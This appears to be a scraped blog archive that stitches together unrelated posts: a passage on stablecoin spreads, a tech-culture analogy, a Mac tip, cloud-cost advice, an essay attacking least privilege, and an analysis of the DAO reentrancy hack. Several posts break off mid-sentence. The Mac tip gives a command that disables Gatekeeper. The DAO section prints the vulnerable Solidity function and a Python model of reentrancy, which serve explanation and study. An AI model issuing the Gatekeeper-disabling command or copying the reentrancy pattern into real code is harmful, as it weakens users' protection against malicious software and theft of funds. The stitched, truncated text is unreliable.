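    amount *= (1 - cost)
    print(f"{leg:<24} -> {amount:,.2f} remaining")

print(f"Total friction: {100_000 - amount:,.2f} ({(1 - amount / 100_000) * 100:.2f}%)")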

Individual users in countries with unstable currencies face similar challenges. While holding USDT or USDC protects against local currency devaluation, the cost of frequently moving between local currency and stablecoins can be prohibitive. The spread becomes a “tax” on financial stability that disproportionately affects those who can least afford it.

7.3 Revolut’s 1:1 Model: Internalizing the Cost

Revolut’s recent introduction of true 1:1 conversions between USD and stablecoins (USDC and USDT) represents a fundamentally different approach to solving the spread problem. Rather than passing market making costs to users, Revolut absorbs the spread internally, guaranteeing that $1.00 in fiat equals exactly 1.00 stablecoin units in both directions, with no hidden markups.

This model is economically viable for Revolut because of several structural advantages. First, as a neobank with 65 million users and existing banking infrastructure, Revolut already maintains substantial fiat currency liquidity and doesn’t need to rely on external banking partners for every stablecoin conversion. Second, the company generates revenue from other services within its ecosystem (subscription fees, interchange fees from card spending, interest on deposits), allowing it to treat stablecoin conversions as a loss leader or break even feature that enhances customer retention and platform stickiness.

Third, by setting a monthly limit of approximately $578,000 per customer, Revolut manages its risk exposure while still accommodating the vast majority of retail and small business use cases. This prevents arbitrage traders from exploiting the zero spread model to make risk free profits by moving large volumes between Revolut and other platforms where spreads exist.

Revolut essentially bets that the value of removing friction from fiat to crypto conversions, thereby making stablecoins genuinely useful as working capital rather than speculative assets, will drive sufficient user engagement and platform growth to justify the cost of eliminating spreads. For users, this transforms the economics of stablecoin usage, particularly for frequent converters or those operating in high currency volatility environments.

7.4 Why Not Everyone Can Offer 1:1 Conversions

The challenge for smaller platforms and pure cryptocurrency exchanges is that they lack Revolut’s structural advantages. A standalone crypto exchange without banking licenses and integrated fiat services must partner with banks for fiat on ramps, pay fees to those partners, maintain separate liquidity pools, and manage the regulatory complexity of operating in multiple jurisdictions. These costs don’t disappear simply because users want better rates; they must be recovered somehow.

Additionally, maintaining tight spreads or true 1:1 conversions requires deep liquidity and sophisticated risk management. When thousands of users simultaneously want to exit stablecoins during market stress, a platform must have sufficient reserves to honor redemptions instantly without moving the price. Smaller platforms operating with thin liquidity buffers cannot safely eliminate spreads without risking insolvency during volatile periods.

The market structure for stablecoins also presents challenges. While stablecoins theoretically maintain 1:1 pegs, secondary market prices on decentralized exchanges and between different platforms can vary by small amounts. A platform offering guaranteed 1:1 conversions must either hold sufficient reserves to absorb these variations or accept that arbitrage traders will exploit any price discrepancies, potentially draining liquidity.

7.5 The Competitive Implications

Revolut’s move to zero spread stablecoin conversions could trigger a competitive dynamic in the fintech space, similar to how its original zero fee foreign exchange offering disrupted traditional currency conversion. Established players like Coinbase, Kraken, and other major exchanges will face pressure to reduce their spreads or explain why their costs remain higher.

For traditional banks contemplating stablecoin integration, the spread question becomes strategic. Banks could follow the Revolut model, absorbing spread costs to drive adoption and maintain customer relationships in an increasingly crypto integrated financial system. Alternatively, they might maintain spreads but offer other value added services that justify the cost, such as enhanced compliance, insurance on holdings, or integration with business treasury management systems.

The long term outcome may be market segmentation. Large, integrated fintech platforms with diverse revenue streams can offer true 1:1 conversions as a competitive advantage. Smaller, specialized platforms will continue operating with spreads but may differentiate through speed, blockchain coverage, or serving specific niches like high volume traders who value depth of liquidity over tight spreads.

For stablecoin issuers like Circle and Tether, the spread dynamics affect their business indirectly. Wider spreads on third party platforms create friction that slows stablecoin adoption, reducing the total assets under management that generate interest income for issuers. Partnerships with platforms offering tighter spreads or true 1:1 conversions could accelerate growth, even if those partnerships involve revenue sharing or other commercial arrangements.

Ultimately, the bid offer spread challenge highlights a fundamental tension in stablecoin economics: the gap between the theoretical promise of 1:1 value stability and the practical costs of maintaining liquidity, managing risk, and operating the infrastructure that connects fiat currency to blockchain based assets. Platforms that can bridge this gap efficiently, whether through scale, integration, or innovative business models, will have significant competitive advantages as stablecoins move from crypto native use cases into mainstream financial infrastructure.

8. Conclusion

Stablecoins represent a significant innovation in digital finance, offering the benefits of cryptocurrency without extreme volatility. They’ve found genuine utility in payments, remittances, and decentralized finance while generating substantial revenue for issuers through interest on reserves. However, they also carry real risks around reserve transparency, regulatory uncertainty, and potential fraud that users and institutions must carefully consider.

The regulatory landscape is rapidly evolving, with authorities worldwide moving toward treating stablecoins as systemically important financial infrastructure requiring bank like oversight. FATF standards impose traditional anti money laundering requirements on stablecoin service providers, creating compliance obligations comparable to traditional finance. Meanwhile, sophisticated monitoring tools have emerged to track flows, detect illicit activity, and ensure reserve adequacy.

For traditional banks, stablecoins represent both a competitive threat to correspondent banking models and an opportunity to modernize payment infrastructure. Rather than being displaced entirely, banks are increasingly positioning themselves as regulated gateways between fiat currency and stablecoins, maintaining customer relationships and compliance functions while leveraging blockchain efficiency.

For banks considering stablecoin integration, working with established infrastructure providers can mitigate technical and compliance challenges. The key is choosing use cases where stablecoins offer clear advantages, particularly in cross border payments and treasury management, while implementing robust risk management, transaction monitoring, and ensuring regulatory compliance with both traditional financial regulations and emerging crypto specific frameworks.

As the regulatory landscape evolves and technology matures, stablecoins are likely to become increasingly integrated into mainstream financial services. Their success will depend on maintaining trust through transparency, security, and regulatory cooperation while continuing to deliver value that traditional financial rails cannot match. The future likely involves a hybrid model where stablecoins and traditional banking coexist, each playing to their respective strengths in a more efficient, global financial system.


Technology Culture: The Sinking Car Syndrome

This is (hopefully) a short blog that will give you back a small piece of your life…

In technology, we rightly spend hours poring over failure in order that we might understand it and therefore fix it and avoid it in the future. This seems a reasonable approach: learn from your mistakes, understand failure, plan your remediation and so on. But is it possible that there are some instances where doing this is inappropriate? To answer this simple question, let me give you an analogy…

You decide that you want to travel from London to New York. Sounds reasonable so far…. But you decide you want to go by car! The reasoning for this is as follows:

  1. Cars are “tried and tested”.
  2. We have an existing deal with multiple car suppliers and we get great discounts.
  3. The key decision maker is a car enthusiast.
  4. The incumbent team understand cars and can support this choice.
  5. Cars are what we have available right now and we want to start execution tomorrow, so let’s just make it work.

You first try a small hatchback and only manage to get around 3m off the coast of Scotland. Next up you figure you will get a more durable car, so you get a truck – but sadly this only makes 2m headway from the beach. You report back to the team and they send you a brand new Porsche; this time you give yourself an even bigger run up at the sea and you manage to make a whopping 4m before the car sinks. The team now analyse all the data to figure out why each car sank and what they can do to make this better. The team continue to experiment with various cars and progress is observed over time. After 6 months the team has managed to travel 12m towards their goal of driving to New York. The main reason for the progress is that the sunken cars are starting to form a land bridge. The leadership has now spent over 200m USD on this venture and doesn’t feel it can pivot, so they start to brainstorm how to make this work.

Maybe wind the windows up a little tighter, maybe the cars need more underseal, maybe over inflate the tyres or maybe we simply need way more cars? All of these may or may not make a difference. But here’s the challenge: you made a bad engineering choice and anything you do will just be a variant of bad. It will never be good and you cannot win with your choice.

The above obviously sounds a bit daft (and it is), but the point is that I am often called in after downtime to review an architecture, find a root cause and suggest remediation. What is not always understood is that bad technology choices can be as likely to succeed as driving from London to New York. Sometimes you simply need to look at alternatives: you need a boat or a plane. The product architecture can be terminal; it won’t ever be what you want it to be, and no amount of analysis or spend will change this. The trick is to accept the brutal reality of your situation and move your focus towards choosing the technology that you need to transition to. Next, try and figure out how quickly you can do this pivot…


How to Install Apps From Anywhere on Apple Mac

Previously, Macs would allow you to install software from anywhere. Now you will see an error message such as “NMAPxx.mpkg cannot be opened because it is from an unidentified developer”. If you want to fix this and enable apps to be installed from anywhere, you will need to run the following command:

sudo spctl --master-disable

Once you have run the command you should then see the “Anywhere” option in the System Preferences > Security & Privacy tab!


Part 2: Increasing your Cloud consumption (the sane way)

Introduction

This article follows on from the “Cloud Migrations Crusade” blog post…

A single tenancy datacenter is a fixed scale, fixed price service on a closed network. The costs of the resources in the datacenter are divided up and shared out to the enterprise constituents on a semi-random basis. If anyone uses fewer resources than forecast, this generates waste which is shared back to the enterprise. If there is more demand than forecast, it will generate service degradation, panic or an outage! This model is clearly fragile and doesn’t respond quickly to change; it is also wasteful because it requires a level of overprovisioning based on forecast consumption (otherwise you will experience delays in projects, service degradation or reduced resilience).

Cloud, on the other hand, is a multi-tenanted on demand software service which you pay for as you use. But surely having multiple tenants running on the same fixed capacity actually increases the risks, and just because it’s in the cloud doesn’t mean that you can get away without over provisioning – so who sits with the over provisioned costs? The cloud providers have to build this into their rates. So cloud providers have to manage a balance sheet of fixed capacity shared amongst customers running on demand infrastructure. They do this with very clever forecasting, very short provisioning cycles, and by asking their customers for forecasts and then offering discounts for pre-commits.

Anything that moves you back towards managing resource levels / forecasting will destroy a huge portion of the value of moving to the cloud in the first instance. For example, if you have ever been to a Re:Invent you will be floored by the rate of innovation and also by how easy it is to absorb these new innovative products. But wait – you just signed a 5yr cost commit and now you learn about Aurora’s new serverless database model. You realise that you can save millions of dollars; but you have to wait for your 5yr commits to expire before you adopt, or maybe start mining bitcoin with all your excess commits! This is anti-innovation and anti-customer.

What’s even worse is that pre-commits are typically signed up front on day 1 – this is total madness! At the point where you know nothing about your brave new world, you use the old costs as a proxy to predict the new costs so that you can squeeze a lousy 5% saving at the risk of 100% of the commit size! What you will start to learn is that your cloud success is NOT based on the commercial contract that you sign with your cloud provider; it’s actually based on the quality of the engineering talent that your organisation is able to attract. Cloud is an IP war – it’s not a legal/sourcing war. Allow yourself to learn, don’t box yourself in on day 1. When you sign the pre-commit you will notice your first year utilisation projections are actually tiny and therefore the savings are small. So what’s the point of signing so early on when the risk is at a maximum and the gains are at a minimum? When you sign this deal you are essentially turning the cloud into a “financial data center” – you have destroyed the cloud before you even started!
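As a back of the envelope illustration (the figures below are invented purely to show the asymmetry), the best case saving from a pre-commit is small relative to the spend you are locking in on day 1:

# Toy numbers only: the point is the asymmetry, not the specific figures.
commit_per_year = 10_000_000     # annual spend promised to the provider
discount = 0.05                  # ~5% saving for signing the commit
actual_usage_year1 = 3_000_000   # year-one usage typically lags the commit

saving_if_fully_used = commit_per_year * discount
shortfall = max(commit_per_year - actual_usage_year1, 0)  # committed spend you don't use

print(f"Best-case annual saving:     ${saving_if_fully_used:,.0f}")
print(f"Year-one shortfall exposure: ${shortfall:,.0f}")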

A Lesson from the field – Solving Hadoop Compute Demand Spike:

We moved 7,000 cores of burst compute to AWS to solve a capacity issue on premise. That’s expensive, so let’s “fix the costs”! We could go and sign an RI (reserved instance), play with spot, buy savings plans or even beg / barter for some EDP relief. But instead we plugged the service usage into QuickSight and analysed the queries. We found one query was using 60 percent of the entire bank’s compute! Nobody confessed to owning the query, so we just disabled it (if you need a reason for your change management, describe the change as “disabling a financial DDOS”). We quickly found the service owner and explained that running a table scan across billions of rows to return a report with just last month’s data is not a good idea. We also explained that if they didn’t fix this we would start billing them in 6 weeks’ time (a few million dollars). The team deployed a fix and now we run the bank’s big data stack at half the cost – just by tuning one query!
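For anyone wanting to repeat this kind of analysis, a minimal sketch in pandas is below. The column names and figures are hypothetical; in practice the data would come from your query usage logs or a warehouse export rather than a hand built DataFrame.

import pandas as pd

# Hypothetical usage export: one row per query execution with its compute cost.
usage = pd.DataFrame({
    "query_id":  ["q1", "q2", "q3", "q1", "q1"],
    "owner":     ["unknown", "risk", "finance", "unknown", "unknown"],
    "cpu_hours": [4200.0, 310.0, 95.0, 3900.0, 4100.0],
})

by_query = usage.groupby(["query_id", "owner"])["cpu_hours"].sum().sort_values(ascending=False)
share = by_query / by_query.sum() * 100

print(share.round(1).head())   # the top query's share of total compute jumps out immediately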

So the point of the above is that there is no substitute for engineering excellence. You have to understand and engineer the cloud to win; you cannot contract yourself into the cloud. The more contracts you sign, the more failures you will experience. This leads me to point 2…

Step 2: Training, Training, Training

Start the biggest training campaign you possibly can – make this your crusade. Train everyone: business, finance, security, infrastructure – you name it, you train it. Don’t limit what anyone can train on; training is cheap – feast as much as you can. Look at Udemy, ACloudGuru, YouTube, WhizLabs and so on. If you get this wrong then you will find your organisation fills up with expensive consultants and bespoke migration products that you don’t need and can easily do yourself, via open source or with your cloud provider’s toolsets. In fact I would go one step further – if you’re not prepared to learn about the cloud, you’re not ready to go there.

Step 3: The OS Build

When you do start your cloud migration and begin to review your base OS images, go right back to the very beginning and remove every single product from these base builds. Look at what you can get out of the box from your cloud provider and really push yourself hard on what you really need vs what is merely nice to have. The trick is that to get the real benefit from a cloud migration, you have to start by making your builds as “naked” as possible. Nothing should move into the base build without a good reason. Ownership and reporting lines are not a good enough reason for someone’s special “tool” to make it into the build. This process, if done correctly, should deliver between 20-40% of your cloud migration savings. Do this badly and your costs, complexity and support will all head in the wrong direction.

Security HAS to be a first class citizen of your new world. In most organisations this will likely make for some awkward cultural collisions (control and ownership vs agility) and some difficult dialogues. The cloud, by definition, should be liberating – so how do you secure it without creating a “cloud bunker” that nobody can actually use? More on this later… 🙂

Step 4: Hybrid Networking

For any organisation with data centers – make no mistake, if you get this wrong it’s over before it starts.


The Least Privileged Lie

In technology, there is a tendency to solve a problem badly by using gross simplification, then come up with a catchy one liner and broadcast it as doctrine or a principle. Nothing ticks more boxes in this regard than the principle of least privilege. The ensuing enterprise scale deadlocks created by a crippling implementation of least privilege are almost certainly lost on its evangelists. This blog will try to put an end to the slavish efforts of many security teams that are trying to ration out micro permissions and hope the digital revolution can fit into some break glass approval process.

What is this “Least Privileged” thing? Why does it exist? What are the alternatives? Wikipedia gives a good overview of this here. The first line contains an obvious and glaring issue: “The principle means giving a user account or process only those privileges which are essential to perform its intended function”. Here the principle is being applied equally to users and processes/code, and it states that we should only give privileges that are essential. In other words, we should treat human beings and code as the same thing and only give humans “essential” permissions. Firstly, who on earth decides what the bar for essential is, and how do they ascertain what is and is not essential? Do you really need to use storage? Do you really need an API? If I give you an API, do you need Puts and Gets?

Human beings are NOT deterministic. If I have a team of humans that can operate under the principle of least privilege then I don’t need them in the first place; I can simply replace them with some AI/RPA. Imagine the brutal pain of a break glass activity every time someone needed to do something “unexpected”. “Hi boss, I need to use the bathroom on the 1st floor – can you approve this? <Gulp> Boss, you took too long… I no longer need your approval!”. Applying least privilege to code would seem to make some sense, BUT only if you never updated the code; and if you did update the code, you would need 100% test coverage.

So why did some bright spark want to duct tape the world to such a brittle, pain yielding principle? At the heart of this are three issues: Identity, Immutability, and Trust. If there are other ways to solve these issues then we don’t need the pain and risks of trying to implement something that will never actually work, creates friction and, critically, creates a false sense of security. Least privilege will never save anyone; you will just be told that if you could have performed this security miracle then you would have been fine. But you cannot, and so you are not.

What’s interesting to me is that the least privilege lie is so widely ignored. For example, just think about how we implement user access. If we truly believed in least privilege then every user would have a unique set of privileges assigned to them. Instead, because we acknowledge this is burdensome, we approximate the privileges that a user will need using policies which we attach to groups. The moment we add a user to one of these groups, we are approximating their required privileges and start to become overly permissive.
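The over-permissiveness is easy to demonstrate with a few lines of Python. The users and permissions below are invented for illustration, but the pattern is the general one: a group policy ends up being the union of what its members need, so every individual member is over-permissioned.

# Made-up permissions to illustrate the point.
needs = {
    "alice": {"s3:Get", "s3:Put"},
    "bob":   {"s3:Get", "sqs:Send"},
    "carol": {"s3:Get", "kms:Decrypt"},
}

group_policy = set().union(*needs.values())   # the group grants everything anyone needs

for user, needed in needs.items():
    excess = group_policy - needed            # permissions granted but never required
    print(f"{user}: granted {len(group_policy)}, needs {len(needed)}, excess {sorted(excess)}")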

Let’s be clear with each other: anyone trying to implement least privilege is living a lie. The extent of the lie normally only becomes clear after the event. So this blog post is designed to re-point energy towards sustainable alternatives that work, and additionally to remove the need for the myriad of micro permissive handbrakes (that routinely get switched off to debug outages and issues).

Who are you?

This is the biggest issue and still remains the largest risk in technology today. If I don’t know who you are then I really, really want to limit what you can do. Experiencing a root/super user account takeover is a doomsday scenario for any organisation. So let’s limit the blast zone of these accounts, right?

This applies equally to code and humans. For code this problem was solved a long time ago, and if you look

Is this really my code?


The DAO Ethereum Recursion Bug: El Gordo!

If you found my article, I would consider it a reasonable assumption that you already understand the importance of this

Brief Introduction

The splitDAO function was created in order for some members of the DAO to separate themselves and their tokens from the main DAO, creating a new ‘child DAO’, for example in case they found themselves in disagreement with the majority.

The child DAO goes through the same 27 day creation period as the original DAO. Pre-requisite steps in order to call a splitDAO function are the creation of a new proposal on the original DAO and designation of a curator for the child DAO.

The child DAO created by the attacker has been referred to as the ‘darkDAO’ on reddit and the name seems to have stuck. The proposal and split process necessary for the attack was initiated at least 7 days prior to the incident.

The first exploit alone would have been economically unviable (the attacker would have needed to put up 1/20th of the stolen amount upfront in the original DAO) and the second alone would have been time intensive, because normally only one splitDAO call can be made per transaction.

One way to see this is that the attacker performed a fraud, or a theft. Another way, more interesting for its implications, is that the attacker took the contract literally and followed the rule of code.

In their (allegedly) own words:

@stevecalifornia on Hacker News – https://news.ycombinator.com/item?id=11926150

“DAO, I closely read your contract and agreed to execute the clause where I can withdraw eth repeatedly and only be charged for my initial withdraw.

Thank you for the $70 million. Let me know if you draw up any other contracts I can participate in.

Regards, 0x304a554a310c7e546dfe434669c62820b7d83490″

The HACK

An “attacker” managed to combine two “exploits” in the DAO.

1) The attacker called the splitDAO function recursively (up to 20 times).

2) To make the attack more efficient, the attacker also managed to replicate the incident from the same two addresses, using the same tokens over and over again (approximately 250 times).

Quote from “Luigi Renna”: To put this instance in a natural language perspective the Attacker requested the DAO “I want to withdraw all my tokens, and before that I want to withdraw all my tokens, and before that I want to… etc.” And be charged only once.

The Code That was Hacked

Below is the now infamous SplitDAO function in all its glory:

function splitDAO(
    uint _proposalID,
    address _newCurator
) noEther onlyTokenholders returns (bool _success) {
    ...
    // Get the ether to be moved. Notice that this is done first!
    uint fundsToBeMoved =
        (balances[msg.sender] * p.splitData[0].splitBalance) /
        p.splitData[0].totalSupply;
    // << This is the line the attacker wants to run more than once
    if (p.splitData[0].newDAO.createTokenProxy.value(fundsToBeMoved)(msg.sender) == false)
        throw;
    ...
    // Burn DAO Tokens
    Transfer(msg.sender, 0, balances[msg.sender]);
    withdrawRewardFor(msg.sender); // be nice, and get his rewards
    // Notice the preceding line runs critically before the next few
    totalSupply -= balances[msg.sender]; // THIS IS DONE LAST
    balances[msg.sender] = 0;            // THIS IS DONE LAST TOO
    paidOut[msg.sender] = 0;
    return true;
}

(Source: http://hackingdistributed.com/2016/06/18/analysis-of-the-dao-exploit/)

The basic idea behind the hack was:

1) Propose a split.
2) Execute the split.
3) When the DAO goes to withdraw your reward, call the function to execute a split before that withdrawal finishes (i.e. recursion).
4) The function will start running again without updating your balance!
5) The line we marked above as “This is the line the attacker wants to run more than once” will run more than once! (A toy model of this is sketched below.)
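To see why step 4 works, here is a toy Python model of the ordering problem. It is deliberately not the DAO code, just the same pattern: funds are sent (control handed to the recipient) before the caller’s balance is zeroed, so a recipient that calls back in gets paid repeatedly.

class ToyDAO:
    """Toy model (not the DAO code) of the ordering bug: the external
    call happens before the caller's balance is zeroed."""
    def __init__(self, balances):
        self.balances = dict(balances)
        self.paid_out = 0

    def split(self, member, on_receive):
        funds = self.balances[member]
        if funds <= 0:
            return
        on_receive(self)           # hands control to the recipient FIRST
        self.paid_out += funds
        self.balances[member] = 0  # ...and only zeroes the balance afterwards
        # Fix: moving "self.balances[member] = 0" above on_receive(self)
        # caps paid_out at the member's real balance.

depth = 0
def reenter(dao):
    global depth
    if depth < 3:                  # the real attack recursed roughly 20 deep
        depth += 1
        dao.split("attacker", reenter)

dao = ToyDAO({"attacker": 100})
dao.split("attacker", reenter)
print(dao.paid_out)                # 400 paid out against a balance of 100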

Thoughts on the Hack

The code is easy to fix, you can just simply zero the balances immediately after calculating the fundsToBeMoved. But this bug is not the real issue for me – the main problem can be split into two areas:

  1. Ethereum contracts are written in a Turing complete language with a stack/heap, exceptions and recursion. This means that even with the best intentions, we will create a vast number of routes through the code base that allow similar recursion and other bugs to be exposed. The only real barrier is how much ether it will cost to expose the bugs.
  2. There is no Escape Hatch for “bad” contracts. Emin Gun Sirer wrote a great article on this here: Escape hatches for smart contracts

Whilst a lot of focus is going into 2), I believe that more focus needs to be put into making the language “safer”. For me, this would involve basic changes like:

  1. Blocking recursion. Blocking recursion at compile and runtime would be a big step forward. I struggle to see a downside to this, as in general recursion doesn’t scale, is slow and can always be replaced with iteration. Replace Recursion with Iteration
  2. Sandbox parameterisation. Currently there are no sandbox parameters to sit the contracts in. This means the economic impact of these contracts is more empirical than deterministic. If you could abstract core parameters of the contract, like the amount and wallet addresses, and place these key values in an immutable wrapper, then unwanted outcomes would be harder to achieve.
  3. Transactionality. Currently there is no obvious mechanism to perform economic functions wrapped in an ATOMIC transaction. This ability would mean that economic values could be copied from the heap to the stack and moved as desired; but critically, recursive calls could not revisit the heap to essentially “duplicate” the value. It would also mean that if a benign fault occurred, the execution of the contract would be idempotent. Obviously blocking recursive calls goes some way towards this; but adding transactionality would be a material improvement.

I have other ideas including segregation of duties using API layers between core and contract code – but am still getting my head around Ethereum’s architecture.
